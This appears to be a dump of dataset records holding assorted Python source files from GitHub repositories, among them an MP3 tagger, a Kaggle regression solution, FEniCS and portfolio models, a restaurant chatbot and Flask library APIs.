except mutagen.id3.ID3NoHeaderError:\n audio = mutagen.File(file_full_path, easy=True)\n audio.add_tags()\n audio['title'] = title_name # 제목\n audio['artist'] = '老梁' # 참여 음악가\n audio['album'] = album_name # 앨범\n audio['version'] = '' # 자막\n audio['albumartist'] = '' # 앨앰 음악가\n audio['composer'] = '' # 작곡가\n audio['conductor'] = '' # 지휘자\n audio['grouping'] = '' # 그룹 설명\n audio['discnumber'] = '' # 집합의 일부\n audio['lyricist'] = '' # 작사가\n audio['genre'] = '时评' # 장르\n audio['date'] = '2010' # 연도\n audio.save()\n","repo_name":"ljyGmail/bulk_edit_mp3_files","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17213891527","text":"\"\"\"\nSantander Value Prediction Challenge\nhttps://www.kaggle.com/c/santander-value-prediction-challenge\n\nGoal: identify the value of transactions for each potential customer\nData: anonymized dataset containing numeric feature variables\nhttps://www.kaggle.com/c/santander-value-prediction-challenge/data\n\nAlgorithms Used: XGB with feature scoring, LGB\nSubmissions and Public Score:\n1-XGB+LGB+with leak train data - 4.55\n2-XGB+LGB+tuning+with leak train data - 1.56943\n\nReferences:\n- https://www.kaggle.com/zeus75/xgboost-features-scoring-with-ligthgbm-model\n- https://www.kaggle.com/johnfarrell/breaking-lb-fresh-start-with-lag-selection\n- https://www.kaggle.com/ogrellier/feature-scoring-vs-zeros\n- https://www.kaggle.com/tezdhar/breaking-lb-fresh-start\n- https://medium.com/@pushkarmandot/https-medium-com-pushkarmandot-what-is-lightgbm-how-to-implement-it-how-to-fine-tune-the-parameters-60347819b7fc\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport lightgbm as lgb\nfrom xgboost import XGBRegressor\nfrom sklearn.metrics import mean_squared_error, mean_squared_log_error\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler, MaxAbsScaler\nfrom sklearn.model_selection import KFold\n\nprint('loading data')\ndata = pd.read_csv('data/train.csv')\ntarget = np.log1p(data['target'])\ndata.drop(['ID', 'target'], axis=1, inplace=True)\ntest = pd.read_csv('data/test.csv')\n\n# Add leaked training data from Kernel: Breaking LB - Fresh start with Lag Selection\n# https://www.kaggle.com/johnfarrell/breaking-lb-fresh-start-with-lag-selection/output\n# Exploits the fact that dataset is a time series in both dimensions\nleak = pd.read_csv('data/train_leak.csv')\ndata['leak'] = leak['compiled_leak'].values\ndata['log_leak'] = np.log1p(leak['compiled_leak'].values)\n\n# Feature scoring with XGB\ndef rmse(y_true, y_pred):\n return mean_squared_error(y_true, y_pred) ** .5\n\nreg = XGBRegressor(n_estimators=10)\nfolds = KFold(n_splits=4, shuffle=True, random_state=42)\nfold_index = [(train, val) for train, val in folds.split(data)]\nscores = []\n\nnb_values = data.nunique(dropna=False)\nnb_zeros = (data == 0).astype(np.uint8).sum(axis=0)\n\nnonfeature_cols = ['log_leak', 'leak', 'target', 'ID']\nfeatures = [f for f in data.columns if f not in nonfeature_cols]\n\nprint('running xgb')\nfor feature in features:\n score = 0\n for train, val in fold_index:\n reg.fit(\n data[['log_leak', feature]].iloc[train],\n target.iloc[train],\n eval_set=[(data[['log_leak', feature]].iloc[val], target.iloc[val])],\n eval_metric='rmse',\n early_stopping_rounds=50,\n verbose=False\n )\n score += rmse(\n target.iloc[val],\n reg.predict(\n data[['log_leak', feature]].iloc[val],\n ntree_limit=reg.best_ntree_limit)\n ) / folds.n_splits\n scores.append((feature, score))\n\nreport = pd.DataFrame(scores, columns=['feature', 'rmse']).set_index('feature')\nreport['nb_zeros'] = nb_zeros\nreport['nunique'] = nb_values\nreport.sort_values(by='rmse', ascending=True, inplace=True)\n\nreport.to_csv('feature_report.csv', index=True)\n\nreport = pd.read_csv('feature_report.csv')\n\nprint('feature selection')\n# Feature selection\nlow_rmse = report['rmse'] <= 0.7955\ngood_features = report.loc[low_rmse].index\nrmses = report.loc[low_rmse, 'rmse'].values\n\n# Add leak to test\ntest_leak = pd.read_csv('data/test_leak.csv')\ntest['leak'] = test_leak['compiled_leak']\ntest['log_leak'] = np.log1p(test_leak['compiled_leak'])\n\n# Model 1\n# Lightgbm\n\n# Use 5 splits this time\nfolds = KFold(n_splits=5, shuffle=True, random_state=1)\ndef add_stats(df):\n df['log_of_mean'] = np.log1p(df[features].replace(0, np.nan).mean(axis=1))\n df['mean_of_log'] = np.log1p(df[features]).replace(0, np.nan).mean(axis=1)\n df['log_of_median'] = np.log1p(df[features].replace(0, np.nan).median(axis=1))\n df['nb_nans'] = df[features].isnull().sum(axis=1)\n df['the_sum'] = np.log1p(df[features].sum(axis=1))\n df['the_std'] = df[features].std(axis=1)\n df['the_kur'] = df[features].kurtosis(axis=1)\n\n return df\n\ndata.replace(0, np.nan, inplace=True)\ndata = add_stats(data)\n\ntest.replace(0, np.nan, inplace=True)\ntest = add_stats(test)\n\n# Only use good features, log leak and stats for training\nextra_features = ['log_leak', 'log_of_mean', 'mean_of_log', 'log_of_median', 'nb_nans', 'the_sum', 'the_std', 'the_kur']\nfinal_features = good_features.tolist() + extra_features\noof_preds = np.zeros(data.shape[0])\ntest['target'] = 0\n\n# Params from zeus75 Kaggle kernel referenced above\nlgb_params = {\n 'objective': 'regression',\n 'num_leaves': 58,\n 'subsample': 0.6143,\n 'colsample_bytree': 0.6453,\n 'min_split_gain': np.power(10, -2.5988),\n 'reg_alpha': np.power(10, -2.2887),\n 'reg_lambda': np.power(10, 1.7570),\n 'min_child_weight': np.power(10, -0.1477),\n 'verbose': -1,\n 'seed': 3,\n 'boosting_type': 'gbdt',\n 'max_depth': -1,\n 'learning_rate': 0.05,\n 'metric': 'l2',\n}\n\nprint('running lgb')\ndef run_lgb(data, lgb, dtrain, target, off_preds, lgb_params):\n for train, val in folds.split(data):\n clf = lgb.train(\n params=lgb_params,\n train_set=dtrain.subset(train),\n valid_sets=dtrain.subset(val),\n num_boost_round=10000,\n early_stopping_rounds=100,\n verbose_eval=0\n )\n oof_preds[val] = clf.predict(dtrain.data.iloc[val])\n test['target'] += clf.predict(test[features]) / folds.n_splits\n print(mean_squared_error(target.iloc[val], oof_preds[val]) ** .5)\n\ndtrain = lgb.Dataset(data=data[features], label=target, free_raw_data=False)\ndtrain.construct()\n\nrun_lgb(data, lgb, dtrain, target, oof_preds, lgb_params)\n\ndata['predictions'] = oof_preds\ndata.loc[data['leak'].notnull(), 'predictions'] = np.log1p(data.loc[data['leak'].notnull(),'leak'])\nprint('OOF SCORE : %9.6f' % (mean_squared_error(target, oof_preds) ** .5))\n# 12.66 on folds with n_split=4\nprint('OOF SCORE with LEAK : %9.6f' % (mean_squared_error(target, data['predictions']) ** .5))\n# 5.44 on folds with n_split=4\n\ntest['target'] = np.expm1(test['target'])\ntest.loc[test['leak'].notnull(), 'target'] = test.loc[test['leak'].notnull(), 'leak']\ntest[['ID', 'target']].to_csv('xgb-lgb-leak1.csv', index=False, float_format='%.2f')\n\n# Model 2\n# Tune lgb params\nlgb_params2 = {\n 'objective': 'regression',\n 'n_estimators': 500,\n 'max_bin': 10,\n 'subsample': 0.8,\n 'subsample_freq': 10,\n 'colsample_bytree': 0.8,\n 'learning_rate': 0.02,\n 'min_child_samples': 500\n}\n\nrun_lgb(data, lgb, dtrain, target, oof_preds, lgb_params2)\n# 1.40596 on folds with n_split=4\n# 1.39831 on folds with n_split=5\n\ndata['predictions'] = oof_preds\ndata.loc[data['leak'].notnull(), 'predictions'] = np.log1p(data.loc[data['leak'].notnull(),'leak'])\nprint('OOF SCORE : %9.6f' % (mean_squared_error(target, oof_preds) ** .5))\n# 1.422552 on folds with n_split=4\n# 1.428494 on folds with n_split=5\n\nprint('OOF SCORE with LEAK : %9.6f' % (mean_squared_error(target, data['predictions']) ** .5))\n# 0.715947 on folds with n_split=4\n# 0.716773 on folds with n_split=5\n\ntest['target'] = np.expm1(test['target'])\ntest.loc[test['leak'].notnull(), 'target'] = test.loc[test['leak'].notnull(), 'leak']\ntest[['ID', 'target']].to_csv('xgb-lgb-leak2.csv', index=False, float_format='%.2f')\n","repo_name":"anaerobeth/kaggle","sub_path":"santander/santander-xgb-lgb.py","file_name":"santander-xgb-lgb.py","file_ext":"py","file_size_in_byte":7357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74996966772","text":"\"\"\"\nPlatform Groups: group-get\n\"\"\"\nfrom typing import Optional, Union\n\nfrom app0.admin.db import db\nfrom app0.admin.group import Group\nfrom app0.admin.services.group_services import get_group_by_name\n\nfrom hopeit.app.api import event_api\nfrom hopeit.app.context import EventContext, PostprocessHook\n\n__steps__ = ['run']\n\n__api__ = event_api(\n query_args=[\n ('name', str, \"Group name\")\n ],\n responses={\n 200: (Group, \"Group\"),\n 404: (str, \"Group not found\")\n }\n)\n\n\nasync def run(payload: None,\n context: EventContext,\n name: str) -> Optional[Group]:\n es = db(context.env)\n return await get_group_by_name(es, name)\n\n\nasync def __postprocess__(payload: Optional[Group], context: EventContext,\n response: PostprocessHook) -> Union[Group, str]:\n if payload is None:\n response.status = 404\n return \"Group not found\"\n return payload\n","repo_name":"fhernand23/stateless-microservices-platform","sub_path":"app0-admin/app0-admin/src/app0/admin/api/group_get.py","file_name":"group_get.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"26991791353","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Licensed under the GNU General Public License, version 3.\n# See the file http://www.gnu.org/licenses/gpl.txt\n\nfrom pisi.actionsapi import get, pisitools, shelltools\n\nNoStrip = [\"/opt\", \"/usr\"]\nIgnoreAutodep = True\n\ndef install():\n pisitools.dodir(\"/opt/SynfigStudio\")\n pisitools.doexe(\"SynfigStudio-1.5.1-2021.10.21-linux64-2cb6c.appimage\", \"/opt/SynfigStudio\")\n pisitools.dosym(\"/opt/SynfigStudio/SynfigStudio-1.5.1-2021.10.21-linux64-2cb6c.appimage\", \"/usr/bin/SynfigStudio\")\n ","repo_name":"pisilinux/pisilife-2","sub_path":"multimedia/graphics/synfig/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"16380986735","text":"import numpy as np\n\nwith open('C:/Users/jboddy/Desktop/aoc/2020/day3input.txt', 'r') as file:\n \n input = [line.strip() for line in file]\n \n parsed_data = list(enumerate(input))\n \n part_1 = sum([(int(line[enum * 3 % len(line)] == '#')) for (enum, line) in parsed_data])\n print(part_1)\n \n jumper_right = [1,3,5,7,1]\n jumper_down = [1,1,1,1,2]\n part_2 = 1\n for (jump_right, jump_down) in zip(jumper_right, jumper_down):\n part_2 = part_2 * sum([int(line[int(enum * jump_right / jump_down % len(line))] == '#') for (enum, line) in parsed_data if (enum % jump_down) == 0])\n print(part_2)\n ","repo_name":"joshuaboddy/advent-of-code","sub_path":"2020/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"72554948854","text":"from dolfin import *\nimport mshr\nfrom sympy.utilities.codegen import ccode\nimport sympy\n\ncomm = mpi_comm_world()\nrank = MPI.rank(comm)\nset_log_level(INFO if rank ==0 else INFO+1)\nparameters[\"std_out_all_processes\"] = False\nparameters[\"ghost_mode\"] = \"shared_vertex\"\nparameters['form_compiler']['cpp_optimize'] = True\nparameters['form_compiler']['optimize'] = True\n\n#Domain and mesh\nW = 40.0 #Width\nH = 40.0 #Height\nresolution = 1.0\nmesh = RectangleMesh(Point(-W/2.0,-H/2.0),Point(W/2.0,H/2.0),int(W/resolution), int(H/resolution),'crossed')\n\n#Object translation in time\nx,y,t = sympy.symbols('x[0], x[1], t')\nPI = 3.141592\nc0 = 0.0\nc1 = 0.0+5.0*sympy.cos(2.0*PI*(t/0.5))\n\n#Object size\nwidth = 10.0\nheight = 3.0\nobjectBool = (x>c0-width/2.0) & (xc1-height/2.0) & (y populacao:\n populacao = pop\n esta_pop = estado\n return esta_pop\n ","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_367/ch165_2020_06_21_15_20_09_384767.py","file_name":"ch165_2020_06_21_15_20_09_384767.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6620343167","text":"\"\"\"\n Portfolio Models\n\n @author: Younghyun Kim\n Created: 2022.09.03\n\"\"\"\nimport torch\nimport torch.nn as nn\n\nfrom layers.mapping import Mapping\nfrom layers.transformer import TransformerEnc\n\nfrom models.cfg.ipa_config import IPA_CONFIG\n\n\nclass InvestingPortfolioAllocator(nn.Module):\n \"\"\"\n Investing Portfolio Allocator Class\n \"\"\"\n def __init__(self, config: dict = None):\n \"\"\"\n Initialization\n\n Args:\n config: config\n * dtype: dict\n \"\"\"\n super().__init__()\n\n if config is None:\n config = IPA_CONFIG\n\n self.config = config\n\n self.factor_num = config['factor_num']\n self.slope = config['slope']\n self.dropout = config['dropout']\n self.d_model = config['d_model']\n self.nhead = config['nhead']\n self.nlayers = config['nlayers']\n self.activation = config['activation']\n self.port_type_num = config['port_type_num']\n self.stock_embeds_map_nlayers =\\\n config['stock_embeds_map_nlayers']\n self.w_allocator_nlayers = config['w_allocator_nlayers']\n\n # Positional Encoding\n # 0: PE Port\n # 1: PE Stock\n self.positional_encoding = nn.Embedding(2, self.d_model)\n\n # Port Types Encoding\n self.port_types_embeds = nn.Embedding(\n self.port_type_num, self.d_model)\n\n # Stock Embedding\n self.stock_embeds = Mapping(self.factor_num, self.d_model,\n self.stock_embeds_map_nlayers,\n 'first', self.slope,\n self.dropout, True)\n\n # Transformer Encoder for Allocation\n self.attn = TransformerEnc(self.d_model, self.nhead,\n self.nlayers, self.d_model * 2,\n self.dropout, self.activation, True)\n\n # Weights Allocator\n self.w_allocator = Mapping(self.d_model, 1,\n self.w_allocator_nlayers,\n 'last', self.slope, self.dropout,\n False)\n\n self.apply(self._init_weights)\n\n def _init_weights(self, module):\n \" Initialize Model Weights \"\n if isinstance(module, (nn.Linear, nn.Embedding)):\n module.weight.data.normal_(mean=0.0, std=0.02)\n if isinstance(module, nn.Linear) and module.bias is not None:\n module.bias.data.zero_()\n elif isinstance(module, nn.LayerNorm):\n module.bias.data.zero_()\n module.weight.data.fill_(1.0)\n\n @property\n def device(self):\n return next(self.parameters()).device\n\n def forward(self, stocks_in, port_type_idx,\n enc_time_mask=False, enc_key_padding_mask=None):\n \"\"\"\n Inference\n\n Args:\n stocks_in: multifactor scores data for observations\n * dtype: torch.FloatTensor\n * shape: (batch_size, stock_num, factor_num)\n port_type_idx: portfolio strategy type index\n * dtype: torch.LongTensor\n * shape: (batch_size)\n Returns:\n weights: portfolio weights\n * dtype: torch.FloatTensor\n * shape: (batch_size, stock_num)\n outputs: transformer outputs\n * dtype: torch.FloatTensor\n * shape: (batch_size, stock_num, d_model)\n \"\"\"\n batch_size, stock_num, _ = stocks_in.shape\n\n # Port Idx Info\n port_types = self.port_types_embeds(port_type_idx).unsqueeze(1)\n\n pe_port = self.positional_encoding(\n torch.tensor([0]).to(self.device)).view(1, 1, self.d_model)\n pe_port = pe_port.repeat(batch_size, 1, 1)\n\n ports = port_types + pe_port\n\n # Stock Encodings\n stocks_enc = self.stock_embeds(stocks_in)\n\n pe_stocks = self.positional_encoding(\n torch.tensor([1]).to(self.device)).view(1, 1, self.d_model)\n pe_stocks = pe_stocks.repeat(batch_size, stock_num, 1)\n\n stocks = stocks_enc + pe_stocks\n\n inputs = torch.cat((ports, stocks), dim=1)\n\n outputs = self.attn(inputs,\n enc_time_mask, enc_key_padding_mask)\n\n out_preds = self.w_allocator(outputs[:, 1:])\n weights = out_preds.squeeze(-1).softmax(dim=-1)\n\n return weights, outputs","repo_name":"kimyoungh/rich","sub_path":"models/portfolio.py","file_name":"portfolio.py","file_ext":"py","file_size_in_byte":4500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13420262449","text":"from __future__ import absolute_import\nfrom __future__ import unicode_literals\nfrom subprocess import call\nfrom speech_recognition.mainModule import Speech_Reg\nimport random\nfrom CrfTagger import CRFTagger\nfrom yelpAPI import GetAPIResults\nimport unicodedata\nimport re\nfrom nltk.tag.api import TaggerI\nfrom nltk.tag import StanfordPOSTagger\n\nimport os\n\nos.environ['CLASSPATH']=\"/Users/louis/Documents/CSCI_544/BSLVChatbot/stanford-postagger-2015-12-09/stanford-postagger.jar\"\nos.environ['STANFORD_MODELS']=\"/Users/louis/Documents/CSCI_544/BSLVChatbot/stanford-postagger-2015-12-09/models\"\n\nclass BSLVChatBot:\n\n def __init__(self):\n self.sr = Speech_Reg()\n\nclass Fix_choice:\n\n def __init__(self):\n self.bslvChatBotObj = BSLVChatBot().sr\n self.STARTUP_FILTER={}\n self.resultDict = {}\n self.analyzedSentimentDict = {}\n self.BOOLEAN_PRICE = False\n self.BOOLEAN_LOCATION = False\n self.BOOLEAN_CUISINE = False\n\n self.fetchedRestaurant=[]\n self.fetchedAddress = []\n self.fetchedURL = []\n\n self.PRICE_VALUE = \"\"\n self.LOCATION_VALUE = \"\"\n self.CUISINE_VALUE = \"\"\n\n self.STARTUP_FILTER[\"GREETING_WORDS\"]=[\"Hi, How may I help you\",\"What can I do for you Today\",\n \"How may I help you today\",\" Hi, Ready to eat ?\", \"Hi, I am happy you are here !. What type of restaurant you are looking for ?\"]\n\n self.STARTUP_FILTER['PRICE_GIVEN']=[\"Great!, May I know what location would you like ?\",\n \"Great!, May I know what type of cuisine would you like ?\",\"Location ?\",\n \"Cuisine?\",\"Awesome!, can you tell me location and Cuisine ?\",\n \"Any preferences of location and cuisine ?\",\"Location please\", \"May I know your choice of Cuisine please ?\"\n \"Cuisine and Location please\"]\n\n self.STARTUP_FILTER['LOCATION_GIVEN']=[\"I would like to know the type of cuisine please\",\"cuisine preferences?\",\n \"Wow!, good choice now tell me the price (Cheap / Moderate / Medium / Expensive) range \",\n \"Great place, can you tell me what cuisine and price (Cheap / Moderate / Medium / Expensive) you looking for?\",\n \"Price please (Cheap / Moderate / Medium / Expensive) \",\"Cuisine please\",\"great , May I know your preferred price (Cheap / Moderate / Medium / Expensive) range\"]\n\n self.STARTUP_FILTER['CUISINE_GIVEN']=[\"Tell me the Price (Cheap / Moderate / Medium / Expensive) range\",\"Tell me the location please\",\n \"Can you tell me the price (Cheap / Moderate / Medium / Expensive) and location\",\"Price please (Cheap / Moderate / Medium / Expensive) \",\"Any preferred price (Cheap / Moderate / Medium / Expensive)\",\n \"Any preferred location\",\n \"Good choice, I would like to know your preferred location as well\"]\n\n self.STARTUP_FILTER['PRICE_LOCATION_GIVEN']= [\"I just need one more Information, can you tell me the Cuisine type please\",\n \"Favourite cuisine ?\", \"Can I have your cuisine preference please ?\"]\n\n self.STARTUP_FILTER['PRICE_CUISINE_GIVEN'] = [\"Can you tell me the location please\",\"Location please\",\"Preferred Location?\",\n \"I would like to know what location you are looking for?\"]\n\n self.STARTUP_FILTER['LOCATION_CUISINE_GIVEN'] = [\"What price (Cheap / Moderate / Medium / Expensive) range you are looking for?\",\"Can you tell me the expected price (Cheap / Moderate / Medium / Expensive) please?\",\n \"May i know your price (Cheap / Moderate / Medium / Expensive) range?\",\"Any price preferences (Cheap / Moderate / Medium / Expensive) ?\"]\n\n self.STARTUP_FILTER['STANDARD_RESPONSE'] = [\"let's talk about restaurants\",\n \"I'm here to recommend you restaurants\",\"My knowledge is limited to restaurants\",\"I can assist you to choose good restaurants\", \"Shall we discuss about restaurants ?\"]\n\n self.STARTUP_FILTER['INCORRECT_ANSWERS'] = [\"Sorry, I didn't catch that\"]\n\n def temp_crf(self, sentence):\n split_list = sentence.split(\" \")\n ct = CRFTagger()\n ct.form_pos_tag_list(\"/Users/louis/Documents/CSCI_544/BSLVChatbot/pos_data.txt\")\n result = ct.tag(split_list)\n\n for word, tag in result:\n if 'B-CUISINE' in tag:\n if self.BOOLEAN_CUISINE == False:\n self.BOOLEAN_CUISINE = True\n self.CUISINE_VALUE = word.lower()\n if 'B-PRICE' in tag:\n if self.BOOLEAN_PRICE == False:\n self.BOOLEAN_PRICE = True\n self.PRICE_VALUE = word.lower()\n if 'B-LOCATION' in tag:\n if self.BOOLEAN_LOCATION == False:\n self.BOOLEAN_LOCATION = True\n self.LOCATION_VALUE = word.lower()\n if 'I-LOCATION' in tag:\n self.BOOLEAN_LOCATION = True\n self.LOCATION_VALUE += \" \"+word.lower()\n\n if self.BOOLEAN_LOCATION or self.BOOLEAN_PRICE or self.BOOLEAN_CUISINE:\n return self.fix_choice()\n else:\n return self.fix_choice(\"invalid_choice\")\n\n def handle_negatives(self):\n print(\"My apology. Can you please tell me with what attribute you are uncomfortable with ? [Cuisine / Location / Price]\")\n confirmValue2 = self.bslvChatBotObj.speech_recognition()\n if confirmValue2 is not None:\n if \"cuisine\" in confirmValue2.lower() and \"location\" in confirmValue2.lower() and \"price\" in confirmValue2.lower():\n print(\"Line 106\")\n self.BOOLEAN_CUISINE = False\n self.BOOLEAN_LOCATION = False\n self.BOOLEAN_PRICE = False\n elif \"cuisine\" in confirmValue2.lower() and \"location\" in confirmValue2.lower():\n self.BOOLEAN_CUISINE = False\n self.BOOLEAN_LOCATION = False\n elif \"cuisine\" in confirmValue2.lower() and \"price\" in confirmValue2.lower():\n self.BOOLEAN_CUISINE = False\n self.BOOLEAN_PRICE = False\n elif \"location\" in confirmValue2.lower() and \"price\" in confirmValue2.lower():\n self.BOOLEAN_LOCATION = False\n self.BOOLEAN_PRICE = False\n elif \"cuisine\" in confirmValue2.lower():\n self.BOOLEAN_CUISINE = False\n elif \"location\" in confirmValue2.lower():\n self.BOOLEAN_LOCATION = False\n elif \"price\" in confirmValue2.lower():\n self.BOOLEAN_PRICE = False\n else:\n self.handle_negatives()\n return self.fix_choice()\n else:\n self.handle_negatives()\n\n def call_speech(self):\n confirmValue = None\n while confirmValue is None or (\"yes\" not in confirmValue.lower() and \"no\" not in confirmValue.lower()):\n confirmValue = self.bslvChatBotObj.speech_recognition()\n if \"yes\" in confirmValue.lower():\n return True\n elif \"no\" in confirmValue.lower():\n return self.handle_negatives()\n\n\n def fix_choice(self, invalid_choice=False):\n final_return_value =\"\"\n if invalid_choice == \"invalid_choice\":\n question = random.choice(self.STARTUP_FILTER['STANDARD_RESPONSE'])\n if question is not None:\n final_return_value += question\n else:\n final_return_value += random.choice(self.STARTUP_FILTER['STANDARD_RESPONSE'])\n if self.BOOLEAN_PRICE and self.BOOLEAN_LOCATION and self.BOOLEAN_CUISINE:\n print(\"Just to confirm once, You preferred \" + self.CUISINE_VALUE + \" for Cuisine , \" + self.PRICE_VALUE + \" for Price and \" + self.LOCATION_VALUE + \" for Location., Is this correct ?. [Yes / No]\")\n ret = self.call_speech()\n if ret == True:\n yelpObj = GetAPIResults()\n self.resultDict,self.analyzedSentimentDict = yelpObj.get_results(self.LOCATION_VALUE.lower(), self.PRICE_VALUE, self.CUISINE_VALUE.lower())\n if self.resultDict is None or len(self.resultDict) == 0:\n self.BOOLEAN_LOCATION = False\n self.BOOLEAN_PRICE = False\n self.BOOLEAN_CUISINE = False\n self.CUISINE_VALUE = \"\"\n self.PRICE_VALUE = \"\"\n self.LOCATION_VALUE = \"\"\n print(\"Sorry, No results found for the given preferences. Let me give another try\")\n return self.temp_crf(\"I want to eat\")\n print()\n print(\"################# Here you Go #################\")\n print()\n counter = 0\n keylist = [\"Name: \",\"URL: \",\"Address: \",\"Overall Review: \"]\n for key,value in self.resultDict.items():\n if counter < 3:\n i=0\n counter_2 = 0\n print(\"---------------------------------\")\n for val in value:\n if counter_2 == 3:\n if val in self.analyzedSentimentDict:\n review = self.analyzedSentimentDict[val]\n print(keylist[i],review)\n else:\n print(keylist[i],val)\n i=i+1\n counter_2+=1\n print(\"---------------------------------\")\n counter = counter+1\n print()\n return \"!!!!!!!!!!!!!!!!!!!!!! Bon appetit !!!!!!!!!!!!!!!!!!!!!!\"\n else:\n return ret\n elif self.BOOLEAN_CUISINE and self.BOOLEAN_LOCATION:\n question = random.choice(self.STARTUP_FILTER['LOCATION_CUISINE_GIVEN'])\n if question is not None:\n final_return_value += question\n else:\n final_return_value += random.choice(self.STARTUP_FILTER['LOCATION_CUISINE_GIVEN'])\n\n elif self.BOOLEAN_PRICE and self.BOOLEAN_LOCATION:\n question = random.choice(self.STARTUP_FILTER['PRICE_LOCATION_GIVEN'])\n if question is not None:\n final_return_value += question\n else:\n final_return_value += random.choice(self.STARTUP_FILTER['PRICE_LOCATION_GIVEN'])\n\n elif self.BOOLEAN_CUISINE and self.BOOLEAN_PRICE:\n question = random.choice(self.STARTUP_FILTER['PRICE_CUISINE_GIVEN'])\n if question is not None:\n final_return_value += question\n else:\n final_return_value += random.choice(self.STARTUP_FILTER['PRICE_CUISINE_GIVEN'])\n\n elif self.BOOLEAN_PRICE:\n question = random.choice(self.STARTUP_FILTER['PRICE_GIVEN'])\n if question is not None:\n final_return_value += question\n else:\n final_return_value += random.choice(self.STARTUP_FILTER['PRICE_GIVEN'])\n\n elif self.BOOLEAN_CUISINE:\n question = random.choice(self.STARTUP_FILTER['CUISINE_GIVEN'])\n if question is not None:\n final_return_value += question\n else:\n final_return_value += random.choice(self.STARTUP_FILTER['CUISINE_GIVEN'])\n\n elif self.BOOLEAN_LOCATION:\n question = random.choice(self.STARTUP_FILTER['LOCATION_GIVEN'])\n if question is not None:\n final_return_value += question\n else:\n final_return_value += random.choice(self.STARTUP_FILTER['LOCATION_GIVEN'])\n return final_return_value\n\nif __name__ == '__main__':\n choice = Fix_choice()\n while True:\n return_value = choice.bslvChatBotObj.speech_recognition()\n if return_value is not None:\n print(\"ChatBot: \"+str(choice.temp_crf(return_value)))\n if choice.BOOLEAN_CUISINE and choice.BOOLEAN_LOCATION and choice.BOOLEAN_PRICE:\n break","repo_name":"louisarokiaraj/BSLVChatbot","sub_path":"speech_recognition/BSLVChatBot.py","file_name":"BSLVChatBot.py","file_ext":"py","file_size_in_byte":12465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74542352053","text":"import logging\n\nfrom flask import g\nfrom flask_restful import Resource, reqparse\n\nfrom App.apis.api_constant import book_error, data_response\nfrom App.apis.library.utils.utils_request import get_book, check_book, get_image\nfrom App.apis.new_login.utils.utils_cache import new_login_required\nfrom App.apis.new_login.utils.utils_data_processing import marshal_library_history_list, marshal_library_list\nfrom App.apis.new_login.utils.utils_request import get_library_history_list, get_library_favorite, get_library_list\n\nparse_library = reqparse.RequestParser()\nparse_library.add_argument('book', type=str, help='请提交正确的参数Key', required=True, location=['args'])\nparse_library.add_argument('page', type=str, help='请提交正确的参数Key', required=True, location=['args'])\nparse_library.add_argument('row', type=str, help='请提交正确的参数Key', required=True, location=['args'])\n\nparse_shelf = reqparse.RequestParser()\nparse_shelf.add_argument('id', type=str, help='请提交正确的参数Key', required=True, location=['args'])\n\nparse_image = reqparse.RequestParser()\nparse_image.add_argument('isbn', type=str, help='请提交正确的参数Key', required=True, location=['args'])\nparse_image.add_argument('title', type=str, help='请提交正确的参数Key', required=True, location=['args'])\n\nparse_list = reqparse.RequestParser()\nparse_list.add_argument(\"page\", type=str, help='请输入页码', required=True, location=['json'])\nparse_list.add_argument(\"rows\", type=str, help='请输入大小', required=True, location=['json'])\n\n\nclass Library(Resource):\n def get(self):\n args = parse_library.parse_args()\n book_name = args.get('book')\n page = args.get('page')\n row = args.get('row')\n try:\n data = get_book(book_name, page, row)\n if data:\n return {\n \"status\": 200,\n \"msg\": \"抓取成功\",\n \"data\": data\n }\n except Exception as e:\n logging.info(e)\n return book_error\n\n\nclass OnShelf(Resource):\n def get(self):\n args = parse_shelf.parse_args()\n id = args.get('id')\n try:\n data = check_book(id)\n return {\n \"status\": 200,\n \"msg\": \"抓取成功\",\n \"data\": data\n }\n except Exception as e:\n logging.info(e)\n return book_error\n\n\nclass BookImage(Resource):\n def get(self):\n args = parse_image.parse_args()\n isbn = args.get('isbn')\n title = args.get('title')\n data = get_image(isbn, title)\n try:\n return {\n \"status\": 200,\n \"msg\": \"抓取成功\",\n \"data\": data\n }\n except Exception as e:\n logging.info(e)\n return book_error\n\n\nclass libraryList(Resource):\n @new_login_required\n def get(self):\n args = parse_list.parse_args()\n page = args.get('page')\n rows = args.get('rows')\n try:\n if g.is_cook:\n data = get_library_list(g.lib_cook, page, rows)\n msg = marshal_library_list(data)\n return data_response(200, '请求成功', msg)\n else:\n return data_response(500, 'Cookie错误', '')\n except Exception as e:\n logging.info(e)\n return data_response(500, e, '')\n\n\nclass libraryHistoryList(Resource):\n @new_login_required\n def get(self):\n args = parse_list.parse_args()\n page = args.get('page')\n rows = args.get('rows')\n try:\n if g.is_cook:\n data = get_library_history_list(g.lib_cook, page, rows)\n msg = marshal_library_history_list(data)\n return data_response(200, '请求成功', msg)\n else:\n return data_response(500, 'Cookie错误', '')\n except Exception as e:\n logging.info(e)\n return data_response(500, e, '')\n\n\nclass libraryFavorite(Resource):\n @new_login_required\n def get(self):\n args = parse_list.parse_args()\n page = args.get('page')\n rows = args.get('rows')\n try:\n if g.is_cook:\n data = get_library_favorite(g.lib_cook, page, rows)\n return data_response(200, '请求成功', data)\n else:\n return data_response(500, 'Cookie错误', '')\n except Exception as e:\n logging.info(e)\n return data_response(500, e, 